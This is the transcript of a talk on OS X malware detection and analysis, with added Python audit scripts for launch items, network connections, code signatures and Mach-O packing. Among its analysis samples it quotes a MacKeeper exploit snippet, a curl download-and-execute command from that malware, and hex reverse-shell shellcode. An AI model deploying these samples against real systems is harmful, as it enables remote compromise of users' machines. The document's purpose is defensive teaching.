let's play doctor....by patrick wardle
TRANSCRIPT
LET’S PLAY DOCTOR practical os x malware detection & analysis
@patrickwardle
WHOIS
“leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints”
@patrickwardle
security for the 21st century
career / hobby
OUTLINE: STEPS TO A HAPPIER, HEALTHIER 2016
outbreaks
virology
diagnostics
analysis
health & happiness
PART 0x1: OUTBREAKS
overview of recent OS X malware specimens
MALWARE ON OS X: yes; it exists and is getting more prevalent
“It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” - apple.com (2012)
2014: "nearly 1000 unique attacks on Macs; 25 major families" - kaspersky
2015: "The most prolific year in history for OS X malware... 5x more OS X malware appeared in 2015 than during the previous five years combined" - bit9
2015: OS X most vulnerable software by CVE count - cvedetails
OSX/IWORM: 'standard' backdoor, providing survey, download/execute, etc.
# fs_usage -w -f filesys
20:28:28.727871  open   /Library/LaunchDaemons/com.JavaW.plist
20:28:28.727890  write  B=0x16b
launch daemon; survey; download; execute
persisting
infected torrents; launch daemon plist
OSX/CRISIS (RCSMAC): Hacking Team's implant; collect all things!
launch agent; rootkit component
persistence (leaked source code)
intelligence collection
“HackingTeam Reborn; Analysis of an RCS Implant Installer"
OSX/XCODEGHOST: application infector
$ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
...
Name = ALL_OTHER_LDFLAGS;
DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $(OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices";
modified Ld.xcspec file
source -> compile -> app store -> infected app -> app installed
infected :(
found by: Claud Xiao
OSX/GENIEO (INKEEPR): most prolific OS X adware
browser extension(s); fake installers
bundled with apps
ADs
OSX/BACKDOOR(?): bot/backdoor that exploits MacKeeper
<script>window.location.href='com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/<BASE_64_ENCODED_STUB>';...
"[a] flaw in MacKeeper's URL handler implementation allows arbitrary remote code execution when a user visits a specially crafted web page" - baesystems
exploit & payload
launch agent
curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh
shell; download; execute; survey
OSX/KERANGER: first (in-the-wild, functional) OS X ransomware
official app website; distributing!
'validly'signed
/Users/*
/Volumes: *.doc, *.jpg, etc
transmissionbt.com
OSX/CARETO ('MASK'): 'cyber espionage backdoor'
launch agent
[~/Library/LaunchAgents/com.apple.launchport.plist]
lea  rdi, encodedServer    ; "\x16d\n~\x1AcM!"...
mov  rsi, decodedServer
call __Dcd
...
mov  rdi, decodedServer
mov  esi, cs:_port
call _sbd_connect
$ lldb OSX_Careto
(lldb) target create "OSX_Careto"
Current executable set to 'OSX_Careto' (x86_64).
(lldb) b _Dcd
Breakpoint 1: where = OSX_Careto`_Dcd, ...
...
(lldb) x/s decodedServer
0x100102b40: "itunes212.appleupdt.com"
disassembly
debugging (decoding C&C)
encoded strings
phishing/exploits
PART 0x2: VIROLOGY
study of OS X malware characteristics & commonalities
INFECTION VECTORS, METHOD 0x1: via user-interaction
fake codecs
fake installers/updates
infected torrents
rogue "AV" products???
poor naive users!
INFECTION VECTORS, METHOD 0x2: exploits
"interested in buying zero-day vulnerabilities with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploitation] techniques on OS X" - V. Toropov (email to hacking team)
how the real hackers do it
} ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" + ;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" + ;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" + ;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" + ;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" + ;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" + ;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" + ;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" + ;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"
PERSISTENCE: many options, few used
launch daemons & agents; user login items
browser extensions & plugins
[RSA 2015] "Malware Persistence on OS X"
~20 techniques
FEATURES: dependent on the goals of the malware
[criminal] [espionage]
shell, video, audio, ads, clicks, money, keylogs, surveys, downloads, exec's
SUMMARY: the current state of OS X malware
persistence
‣ well known methods ‣ majority: launch items
self-defense
‣ minimal obfuscation ‣ trivial to detect/remove
features
‣ poorly implemented ‣ suffice for the job
psp bypass
‣ occasional anti-AV ‣ no psp detection
stealth
‣ 'hide' in plain sight ‣ rootkits? not common
infection
‣ trojans/phishing ‣ some exploits
PART 0x3: DIAGNOSTICS
are you infected?
VISUALLY OBSERVABLE INDICATORS: more often than not, you're not infected...
unlikely malware:
"my computer is so slow"
"it keeps crashing"
"so many processes"
possibly malware:
ADs
"there are tons of popups"
"my computer says it's infected"
"my homepage and search engine are weird"
most not trivially observable!
VISUALLY OBSERVABLE INDICATORS: generic alerts may indicate the presence of malware
persistence (BlockBlock); network access (LittleSnitch)
such tools do not attempt to directly detect malware per-se...
STEP 0x1: KNOWN MALWARE: any known malware running on your system?
TaskExplorer (+ VirusTotal integration)
VT ratios
STEP 0x2: SUSPICIOUS PROCESSES: any unrecognized binaries running on your system?
unsigned tasks
"global search" for:
3rd-party tasks
unsigned + "apple" + unrecognized (by VT) = suspicious!
STEP 0x3: SUSPICIOUS PERSISTENCE: any unrecognized binaries persisting on your system?
KnockKnock; enum. persistence
unsigned + "apple" + unrecognized (by VT) = suspicious!
a suspicious launch item
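An added example (not from the talk, and not KnockKnock's code): a small Python audit of launch agent/daemon plists that applies the slide's heuristic on the persistence side. It flags items whose label looks like Apple's but that live in the third-party launch folders (Apple's own launch items ship under /System/Library, so an "apple"-named item in ~/Library/LaunchAgents, like the com.apple.launchport.plist and com.apple.updater.plist seen on the earlier slides, deserves a look), items whose program runs from an unusual location, and items that keep themselves permanently alive. The plists it inspects are constructed in the script; the "expected" path prefixes are an assumption, and the signing and VirusTotal checks from the slide would be layered on top of this.

```python
import os
import plistlib
import tempfile

# Launch-item folders where third-party items live; Apple's own launch items
# ship under /System/Library, so an "apple"-looking label here deserves a look.
THIRD_PARTY_LAUNCH_DIRS = (
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
)

# Assumption: binaries persisted from these prefixes are the normal case.
EXPECTED_BINARY_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/")


def program_path(plist):
    """Binary a launch item runs: 'Program', else ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def audit_launch_item(plist_bytes, known_good_labels=frozenset()):
    """Apply the slide's heuristics to one launch item; returns a list of reasons."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception as exc:                      # a malformed plist is itself worth a look
        return ["unparseable plist: %s" % exc]
    label = str(plist.get("Label", ""))
    if label in known_good_labels:
        return []
    reasons = []
    if label.lower().startswith("com.apple."):
        reasons.append("apple-style label outside /System/Library")
    binary = program_path(plist)
    if binary is None:
        reasons.append("no Program / ProgramArguments")
    elif not binary.startswith(EXPECTED_BINARY_PREFIXES):
        reasons.append("runs from unusual location: %s" % binary)
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (kept running permanently)")
    return reasons


def audit_directory(dirpath, known_good_labels=frozenset()):
    """Map plist path -> reasons for every flagged item in one launch folder."""
    findings = {}
    if not os.path.isdir(dirpath):
        return findings
    for name in sorted(os.listdir(dirpath)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(dirpath, name)
        with open(path, "rb") as fh:
            reasons = audit_launch_item(fh.read(), known_good_labels)
        if reasons:
            findings[path] = reasons
    return findings


# Constructed sample items, shaped after the slides' com.apple.*.plist examples;
# the binary path and the benign item are made up for this demo.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.apple.launchport",
    "ProgramArguments": ["/Users/user/.launchport/launchport"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
    "RunAtLoad": True,
})


def demo():
    """Write both samples into a scratch 'LaunchAgents' folder and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "com.apple.launchport.plist"), "wb") as fh:
            fh.write(SUSPICIOUS_PLIST)
        with open(os.path.join(tmp, "com.example.updater.plist"), "wb") as fh:
            fh.write(BENIGN_PLIST)
        return {os.path.basename(p): r for p, r in audit_directory(tmp).items()}


if __name__ == "__main__":
    for folder in THIRD_PARTY_LAUNCH_DIRS:        # real folders on a Mac; empty elsewhere
        for path, reasons in audit_directory(folder).items():
            print(path, "->", "; ".join(reasons))
    print(demo())
```

A label allowlist (`known_good_labels`) is the place to park the handful of legitimate third-party items on a given machine so that repeated runs only surface new ones.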
STEP 0x4: NETWORK I/O: odd ports or unrecognized connections?
# sudo lsof -i | grep ESTABLISHED
apsd        75 root  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
apsd        75 root  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
com.apple 1168 user  TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED)
JavaW     1184 root  TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED)
iWorm ('JavaW') listening for attacker connection
or 'established' for connected sessions
iWorm connected to C&C server
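An added example, not from the talk: a Python pass over `lsof -i` output that parses each row and applies the slide's two questions (odd ports? unrecognized connections?) mechanically. The sample rows are constructed after the slide's output (apsd, a com.apple process, and the iWorm 'JavaW' task, both listening and connected), padded out to the full lsof column layout; the set of "expected" remote ports is an assumption to be tuned per machine, and the LISTEN row is the case `grep ESTABLISHED` alone would miss.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "command pid user proto local remote state")

# One `lsof -i` row: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME [(STATE)]
LSOF_ROW = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+IPv[46]\s+\S+\s+\S+\s+"
    r"(?P<proto>TCP|UDP)\s+(?P<name>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?\s*$")


def parse_lsof(text):
    """Turn lsof -i text into Conn tuples; header and unrecognised rows are skipped."""
    conns = []
    for line in text.splitlines():
        m = LSOF_ROW.match(line)
        if not m:
            continue
        local, _, remote = m.group("name").partition("->")
        conns.append(Conn(m.group("cmd"), int(m.group("pid")), m.group("user"),
                          m.group("proto"), local, remote or None, m.group("state")))
    return conns


def port_of(endpoint):
    """'host:port' -> 'port' (a service name when lsof ran without -P, e.g. 'https')."""
    return endpoint.rsplit(":", 1)[-1]


# Assumption: remote ports a typical Mac talks to; anything else deserves a look.
EXPECTED_REMOTE_PORTS = {"80", "http", "443", "https", "5223", "993", "imaps",
                         "587", "submission", "22", "ssh", "53", "domain"}


def flag_connections(conns, expected_ports=EXPECTED_REMOTE_PORTS):
    """Return (conn, reason) pairs for sockets the slide would call suspicious."""
    findings = []
    for c in conns:
        if c.state == "LISTEN" and not c.local.startswith(("127.", "localhost:", "[::1]")):
            findings.append((c, "listens on a non-loopback interface: %s" % c.local))
        elif c.state == "ESTABLISHED" and c.remote and port_of(c.remote) not in expected_ports:
            findings.append((c, "established session to unusual remote port %s" % port_of(c.remote)))
    return findings


# Constructed sample, shaped after the slide's output and lsof's real column layout.
SAMPLE_LSOF = """\
COMMAND     PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
apsd         75 root   19u  IPv4 0x3b5b1e2a0c0a9d3d      0t0  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
com.apple  1168 user   12u  IPv4 0x3b5b1e2a0c1b0f2d      0t0  TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED)
JavaW      1184 root    4u  IPv4 0x3b5b1e2a0c2c1a1d      0t0  TCP *:51667 (LISTEN)
JavaW      1184 root    5u  IPv4 0x3b5b1e2a0c2c1a2d      0t0  TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED)
"""

if __name__ == "__main__":
    for conn, reason in flag_connections(parse_lsof(SAMPLE_LSOF)):
        print("%s[%d] (%s): %s" % (conn.command, conn.pid, conn.user, reason))
```

On a live machine pipe `sudo lsof -i -n -P` into `parse_lsof` instead of the sample; with `-P` the ports arrive numeric, which is why the allowlist carries both forms.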
STEP 0x5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC.: countless other things to look for....
uncheck 'Show OS Kexts'
any suspicious kernel extensions?
hijacked dylibs?
[DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
PART 0x4: ANALYSIS
determine if something is malicious.... or not!?
CODE-SIGNING: examine the binary's code signature
$ codesign -dvv /usr/lib/libtidy.A.dylib
Format=Mach-O universal (i386 x86_64)
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
libtidy is signed by apple proper
$ codesign -dvv OSX_Careto
OSX_Careto: code object is not signed at all
most malware; unsigned
signed by apple: not malware!
libtidy dylib flagged by VT
use codesign to display a binary's signing info
ex:$ codesign -dvv <file>
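Added example (not from the talk): a Python parser for `codesign -dvv` output that turns the Authority chain into the buckets this slide uses. Only a chain whose leaf is "Software Signing" under Apple's own code-signing CA is "apple proper"; a Developer ID leaf means Apple issued a certificate to some third party, which is exactly how KeRanger was 'validly' signed, so that bucket still needs triage. The libtidy and OSX_Careto samples are the slide's lines; the Developer ID sample is constructed, and the recognition of the ad-hoc and Mac App Store forms follows codesign's usual output as I know it.

```python
# Apple's own code ("apple proper") carries this leaf; everything else that
# chains to Apple Root CA was merely issued a certificate by Apple.
APPLE_SOFTWARE_SIGNING_LEAF = "Software Signing"


def parse_codesign(output):
    """Parse `codesign -dvv` text into a dict; 'Authority' is the ordered chain (leaf first)."""
    info = {"Authority": [], "unsigned": False}
    for line in output.splitlines():
        line = line.strip()
        if line.endswith("code object is not signed at all"):
            info["unsigned"] = True
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "Authority":
            info["Authority"].append(value)
        else:
            info[key] = value
    return info


def classify_signature(output):
    """Bucket a binary the way the slide does: apple proper, developer id, ..., unsigned."""
    info = parse_codesign(output)
    if info["unsigned"]:
        return "unsigned"
    if info.get("Signature") == "adhoc":
        return "ad-hoc"                  # signed, but with no identity behind it
    chain = info["Authority"]
    if not chain:
        return "signed, no certificate chain"
    if chain[-1] != "Apple Root CA":
        return "non-apple root: " + chain[-1]
    if chain[0] == APPLE_SOFTWARE_SIGNING_LEAF:
        return "apple proper"
    if chain[0].startswith("Developer ID Application:"):
        return "developer id"            # a third party holding an Apple-issued cert
    if chain[0].startswith("Apple Mac OS Application Signing"):
        return "mac app store"
    return "apple-rooted, other leaf: " + chain[0]


def needs_triage(output):
    """Per the slide, only code signed by Apple proper is excused from further analysis."""
    return classify_signature(output) != "apple proper"


# The slide's two runs (relevant lines only) plus one constructed Developer ID case.
LIBTIDY = """\
Executable=/usr/lib/libtidy.A.dylib
Format=Mach-O universal (i386 x86_64)
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
"""
CARETO = "OSX_Careto: code object is not signed at all\n"
THIRD_PARTY = """\
Executable=/Applications/Example.app/Contents/MacOS/Example
Format=app bundle with Mach-O thin (x86_64)
Authority=Developer ID Application: Example Corp (EXAMPLETEAM)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
"""

if __name__ == "__main__":
    for name, sample in (("libtidy", LIBTIDY), ("OSX_Careto", CARETO), ("Example", THIRD_PARTY)):
        print("%-11s %-14s triage=%s" % (name, classify_signature(sample), needs_triage(sample)))
```

To run it against a real file, feed `subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True).stderr` to `classify_signature` (codesign writes this listing to stderr).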
GOOGLE THE HASH: may (quickly) tell you; known good || known bad
$ md5 appleUpdater
MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088
unknown hash.... might be odd
‣ 3rd-party binaries may produce zero hits on google
‣ 0% detection on virustotal doesn't mean 100% not malware
known hash (OSX/Careto)
STRINGS: quickly triage a binary's functionality
$ strings -a OSX_Careto
reverse lookup of %s failed: %s
bind(): %s
connecting to %s (%s) [%s] on port %u
executing: %s
cM!M>`W9_c[0;32m
strings; OSX/Careto
networking & exec logic
encoded strings
$ strings -a JavaW
$Info: This file is packed with the UPX executable packer
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team.
strings; iWorm
use with the -a flag
packed (UPX)
google interesting strings
FILE ATTRIBUTES: OS X natively supports encrypted binaries
our hard work by these words guarded please dont steal (c) Apple C
encrypted with Blowfish
disassembling Finder.app
encrypting the malware
$ strings -a myMalware
infectUser:
ALOHA RSA!
$ ./protect myMalware
encrypted 'myMalware'
$ strings -a myMalware
n^jd[P5{Qr_`EYFaJq07
known malware: ~50% drop VT detection
FILE ATTRIBUTES: detecting encrypted binaries
// check all load commands
for(int i = 0; i < [machoHeader[LOAD_CMDS] count]; i++)
{
    // grab load command (assumed here to point at a segment command)
    loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];

    // check text segment
    if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)))
    {
        // check if segment is protected
        if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1))
        {
            // FILE IS ENCRYPTED
        }
    }
}
detecting encryption: TaskExplorer
unsigned + encrypted
FILE ATTRIBUTES: malware is often packed to 'hinder' detection/analysis
$ strings -a JavaW
Info: This file is packed with the UPX executable packer http://upx.sf.net
Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved.
iWorm (JavaW); packed
// count all occurrences
for(NSUInteger i = 0; i < length; i++)
    occurrences[0xFF & (int)data[i]]++;

// calc entropy
for(NSUInteger i = 0; i < sizeof(occurrences)/sizeof(occurrences[0]); i++)
{
    // add occurrences to entropy
    if(0 != occurrences[i])
    {
        // calc ratio
        pX = occurrences[i]/(float)length;

        // cumulative entropy
        entropy -= pX*log2(pX);
    }
}
TaskExplorer
generic packer detection algorithm
view all packed tasks/dylibs
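Added example covering this slide and the previous one; it is not TaskExplorer's code. The two file-attribute checks (the SG_PROTECTED_VERSION_1 flag on the __TEXT segment, then Shannon entropy as a generic packer heuristic) are written as a stand-alone Python script that walks the Mach-O load commands with `struct` instead of the talk's Objective-C helpers, handling both 32- and 64-bit thin files and refusing fat/universal containers (slice them first). The Mach-O it inspects is constructed in the script; the magic numbers and flag come from <mach-o/loader.h>; the 7.0 bits/byte threshold is an assumption.

```python
import math
import struct

MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF     # <mach-o/loader.h>
FAT_MAGIC = 0xCAFEBABE                               # universal container (big-endian)
LC_SEGMENT, LC_SEGMENT_64 = 0x1, 0x19
SG_PROTECTED_VERSION_1 = 0x8                         # segment is encrypted

# segment_command / segment_command_64: cmd, cmdsize, segname[16], vmaddr, vmsize,
# fileoff, filesize, maxprot, initprot, nsects, flags
SEG32_FMT, SEG64_FMT = "<II16sIIIIiiII", "<II16sQQQQiiII"


def protected_segments(data):
    """Names of segments carrying SG_PROTECTED_VERSION_1 in a thin, little-endian Mach-O."""
    if len(data) < 32:
        raise ValueError("too short to be a Mach-O")
    if struct.unpack_from(">I", data, 0)[0] == FAT_MAGIC:
        raise ValueError("fat binary: pick an architecture slice first")
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == MH_MAGIC_64:
        hdr_size, seg_cmd, seg_fmt = 32, LC_SEGMENT_64, SEG64_FMT
    elif magic == MH_MAGIC:
        hdr_size, seg_cmd, seg_fmt = 28, LC_SEGMENT, SEG32_FMT
    else:
        raise ValueError("not a little-endian Mach-O")
    ncmds = struct.unpack_from("<I", data, 16)[0]     # same offset in both headers
    names, off = [], hdr_size
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("truncated load command")
        if cmd == seg_cmd:                            # only segment commands carry segname/flags
            fields = struct.unpack_from(seg_fmt, data, off)
            segname = fields[2].split(b"\0", 1)[0].decode("ascii", "replace")
            if fields[-1] & SG_PROTECTED_VERSION_1:
                names.append(segname)
        off += cmdsize
    return names


def is_encrypted(data):
    """The slide's check: is __TEXT marked protected?"""
    return "__TEXT" in protected_segments(data)


def shannon_entropy(data):
    """Bits per byte, 0.0 (constant) .. 8.0 (uniform); packed/encrypted code sits near the top."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    length, entropy = len(data), 0.0
    for c in counts:
        if c:
            p = c / length
            entropy -= p * math.log2(p)
    return entropy


PACKED_THRESHOLD = 7.0   # assumption: plain x86-64 code stays well below this


def looks_packed(data, threshold=PACKED_THRESHOLD):
    return shannon_entropy(data) >= threshold


def build_macho(text_flags, bits=64):
    """Constructed minimal Mach-O (header + __TEXT + __DATA) for testing; not a real binary."""
    if bits == 64:
        seg_fmt, seg_cmd, size = SEG64_FMT, LC_SEGMENT_64, 72
    else:
        seg_fmt, seg_cmd, size = SEG32_FMT, LC_SEGMENT, 56
    text = struct.pack(seg_fmt, seg_cmd, size, b"__TEXT", 0x1000, 0x1000, 0, 0x1000, 7, 5, 0, text_flags)
    body = struct.pack(seg_fmt, seg_cmd, size, b"__DATA", 0x2000, 0x1000, 0x1000, 0x1000, 7, 3, 0, 0)
    if bits == 64:   # magic, cputype(x86_64), cpusubtype, filetype(MH_EXECUTE), ncmds, sizeofcmds, flags, reserved
        hdr = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x01000007, 3, 2, 2, len(text) + len(body), 0x85, 0)
    else:
        hdr = struct.pack("<IiiIIII", MH_MAGIC, 7, 3, 2, 2, len(text) + len(body), 0x85)
    return hdr + text + body


if __name__ == "__main__":
    print("protected:", is_encrypted(build_macho(SG_PROTECTED_VERSION_1)))
    print("plain:    ", is_encrypted(build_macho(0)))
    print("entropy of uniform bytes: %.2f" % shannon_entropy(bytes(range(256)) * 16))
```

For a real file, hand `open(path, "rb").read()` to `protected_segments` (or an architecture slice of it) and run `looks_packed` over the file; like the slide's algorithm, entropy alone only says "high-entropy", so UPX strings, a missing symbol table, or oddly named sections are the usual confirming signs.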
CLASS-DUMP: extract class names, methods, & more...
$ class-dump RCSMac.app
@interface __m_MCore : NSObject
{
    NSString *mBinaryName;
    NSString *mSpoofedName;
}
- (BOOL)getRootThroughSLI;
- (BOOL)isCrisisHookApp:(id)arg1;
- (BOOL)makeBackdoorResident;
- (void)renameBackdoorAndRelaunch;
@end
RCSMac (OSX/Crisis)
$ class-dump Installer.app
@interface ICDownloader : NSObject <NSURLConnectionDelegate>
{
    NSURL *_URL;
    NSString *_destPath;
    long long _httpStatusCode;
    NSString *_suggestedName;
}
- (void)startDownloading;
@end
@interface NSURL (ICEncryptedFileURLProtocol)
+ (id)fileURLWithURL:(id)arg1;
+ (id)encryptedFileURLWithURL:(id)arg1;
@end
Adware 'Installer' (InstallCore)
http://stevenygard.com/projects/class-dump/
DYNAMIC FILE I/O: quickly determine a binary's file-related actions
# fs_usage -w -f filesystem
open    /Users/user/Library/LaunchAgents/com.apple.updater.plist
write   F=2  B=0x4a
open    F=5  /Users/Shared/dufh
...
chmod   <rwxr-xr-x>  /Users/Shared/dufh
unlink  ./mackeeperExploiter
file i/o (mackeeper exploiter)
$ man fs_usage
FS_USAGE(1)                 BSD General Commands Manual
fs_usage -- report system calls and page faults related to filesystem activity in real-time
fs_usage man page
persistence as launch agent (com.apple.updater.plist)
installation (/Users/Shared/dufh)
self deletion, cleanup
NETWORK I/O: gain insight into the binary's network communications
OSX/Careto in Wireshark
note: C&C is (now) offline
odd DNS queries; periodic beacons; (custom) encrypted traffic
"itunes212.appleupdt.com"
VIRUSTOTAL SANDBOX: file i/o + network i/o, and more!
virustotal portal
file i/o (iWorm)
network i/o (iWorm)
"VirusTotal += Mac OS X execution" blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html
REVERSING OBJECTIVE-C: understanding some basics...
connectedToInternet(void) proc near
    mov  rdi, cs:_OBJC_CLASS_$_NSURL
    mov  rsi, cs:URLWithString       ; "URLWithString:"
    lea  rdx, cfstr_google           ; "www.google.com"
    mov  rax, cs:_objc_msgSend_ptr
    call rax                         ; objc_msgSend
    ...
internet check (mackeeper exploiter)
arg  register  name (for objc_msgSend)
0    RDI       class
1    RSI       method name
2    RDX       1st argument
3    RCX       2nd argument
4    R8        3rd argument
5    R9        4th argument
objc_msgSend function
calling convention (System V AMD64 ABI)
DECOMPILATION: there's an app for that!
int connectedToInternet() {
    rax = [NSURL URLWithString:@"http://www.google.com"];
    rdx = rax;
    var_38 = [NSData dataWithContentsOfURL:rdx];
    if (var_38 != 0x0) {
        var_1 = 0x1;
    }
    else {
        var_1 = 0x0;
    }
    rax = var_1 & 0x1 & 0xff;
    return rax;
}
decompilation; internet check (mackeeper exploiter)
connectedToInternet(void) proc near
    mov  rdi, cs:_OBJC_CLASS_$_NSURL
    mov  rsi, cs:URLWithString_
    lea  rdx, cfstr_google           ; "www.google.com"
    mov  rax, cs:_objc_msgSend_ptr
    call rax
    ...
hopper.app http://www.hopperapp.com
DEBUGGING: using lldb; OS X's debugger
command          description                        example
r                launch (run) the process
b                breakpoint on function             b system
br s -a <addr>   breakpoint on a memory address     br s -a 0x10001337
si / ni          step into / step over
po               print Objective-C object           po $rax
reg read         print all registers
$ lldb newMalware
(lldb) target create "/Users/patrick/malware/newMalware"
Current executable set to '/Users/patrick/malware/newMalware' (x86_64).
beginning a debugging session; see: "Gdb to LLDB Command Map"
common lldb commands
PART 0x5: HEALTH & HAPPINESS
how do I protect my personal Macs?
APPLE'S OS X SECURITY MITIGATIONS? Gatekeeper, XProtect, SIP, code-signing, et al...
"Security & privacy are fundamental to the design of all our hardware, software, and services" - tim cook
‣ "Gatekeeper Exposed" (Shmoocon)
‣ "OS X El Capitan - Sinking the S/h\IP"
‣ "Memory Corruption is for Wussies!" (SysScan)
‣ "Writing Bad@ss OS X Malware" (Blackhat)
‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
only 4 launch items
no 'java' processes
fully patched OS X
gatekeeper enabled
DEMO (Gatekeeper bypass)
OSXLOCKDOWN: hardens OS X & reduces its attack surface
# ./osxlockdown
[PASSED] Enable Auto Update
[PASSED] Disable Bluetooth
[PASSED] Disable infrared receiver
[PASSED] Disable AirDrop
...
osxlockdown 0.9
Final Score 86%; Pass rate: 26/30
osxlockdown, S. Piper (@0xdabbad00)
github.com/SummitRoute/osxlockdown
“built to audit & remediate, security configuration settings on OS X 10.11" - S. Piper
OS X SECURITY TOOL: Little Snitch firewall
“if [Little Snitch] is found, the malware [OSX/DevilRobber.A] will skip installation and proceed to execute the clean software” - fSecure.com
trivial to bypass
security vulnerabilities? yes, stay tuned!
'snitching
MY PERSONAL SECURITY TOOLS: Objective-See, because "sharing is caring" :)
"No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." - fSecure
...as they try to sell things!
+ I should write some OS X security tools to protect my Mac ....and share 'em freely :)
SECURITY TOOLS: objective-see(.com)
KnockKnock BlockBlock
TaskExplorer
Ostiarius
Hijack Scanner
KextViewr RansomWhere?
CONCLUSIONS: wrapping this all up...
CONCLUSIONS & APPLICATION: mahalo for your attention... Q&A?
osx malware (iWorm, Crisis, Genieo, etc.)
learned about: scan & protect!
littlesnitch/firewall
[email protected] @patrickwardle
generic detection & analysis
credits
images:
- iconmonstr.com
- http://wirdou.com/2012/02/04/is-that-bad-doctor/
resources:
- thesafemac.com
- "Mac OS X & iOS Internals", Jonathan Levin
- http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware-and-affected-ios-apps/
- http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html
- http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf